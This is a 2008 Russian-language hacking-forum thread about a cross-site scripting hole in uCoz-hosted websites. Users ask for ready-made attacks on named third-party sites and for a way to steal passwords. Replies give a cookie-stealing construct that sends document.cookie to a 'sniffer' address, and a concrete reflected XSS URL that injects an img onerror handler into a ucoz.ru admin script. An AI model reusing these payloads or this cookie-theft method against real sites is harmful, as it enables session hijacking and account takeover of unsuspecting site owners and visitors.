HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 29.12.2008, 22:05
Sasuke-kun
Новичок
Регистрация: 09.07.2008
Сообщений: 5
С нами: 9388626

Репутация: 0
По умолчанию

Уже не пашет =(
 
Ответить с цитированием

  #12  
Старый 29.12.2008, 22:39
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами: 9270510

Репутация: 519


По умолчанию

Sasuke-kun, че у тебя не пашет???)
Все там пашет!!!111адинадинадин
Пробелы убери прост
 
Ответить с цитированием

  #13  
Старый 29.12.2008, 22:57
Arigona
Banned
Регистрация: 09.12.2008
Сообщений: 142
С нами: 9168806

Репутация: 114
По умолчанию

дайте пример на сайт prostota.ucoz.org, уж очень хочется посмотреть, а то смотрю и не пашет(
 
Ответить с цитированием

  #14  
Старый 29.12.2008, 23:00
Arigona
Banned
Регистрация: 09.12.2008
Сообщений: 142
С нами: 9168806

Репутация: 114
По умолчанию

всё, понял, а как с ней увести пароль как то можно? снифером трудно будет
 
Ответить с цитированием

  #15  
Старый 29.12.2008, 23:07
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами: 9270510

Репутация: 519


По умолчанию

Пробуй так:
alert(адрес снифера+document.cookie)
 
Ответить с цитированием

  #16  
Старый 29.12.2008, 23:09
Chrome~
Постоянный
Регистрация: 13.12.2008
Сообщений: 354
С нами: 9162683

Репутация: 175
По умолчанию

Реально. Автору зачет.
 
Ответить с цитированием

  #17  
Старый 29.12.2008, 23:19
Sasuke-kun
Новичок
Регистрация: 09.07.2008
Сообщений: 5
С нами: 9388626

Репутация: 0
По умолчанию

хм..а у меня не пашет,можите дать готовый пример например к сайту naruto-fan.ru он на ucoz'е
 
Ответить с цитированием

  #18  
Старый 29.12.2008, 23:27
Chrome~
Постоянный
Регистрация: 13.12.2008
Сообщений: 354
С нами: 9162683

Репутация: 175
По умолчанию

Для Mozilla Firefox, Opera и некоторых других браузеров успешно работает такая конструкция:

Код:
http://cat.ucoz.ru/admin/ghckh.php?sape_keys="><img src="a"onerror=alert("XSS")>

Последний раз редактировалось Chrome~; 30.12.2008 в 00:23..
 
Ответить с цитированием

  #19  
Старый 29.12.2008, 23:39
Alexandr II
Постоянный
Регистрация: 28.12.2007
Сообщений: 804
С нами: 9668486

Репутация: 1400


По умолчанию

всё пашет и пашет нормально заслужил +
 
Ответить с цитированием

  #20  
Старый 30.12.2008, 13:30
geforse
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
С нами: 9574565

Репутация: 712


По умолчанию

уже прикрыли ?(
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Xss: Cегодня и вчера. Опрос Constantine Болталка 48 07.12.2009 08:57
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.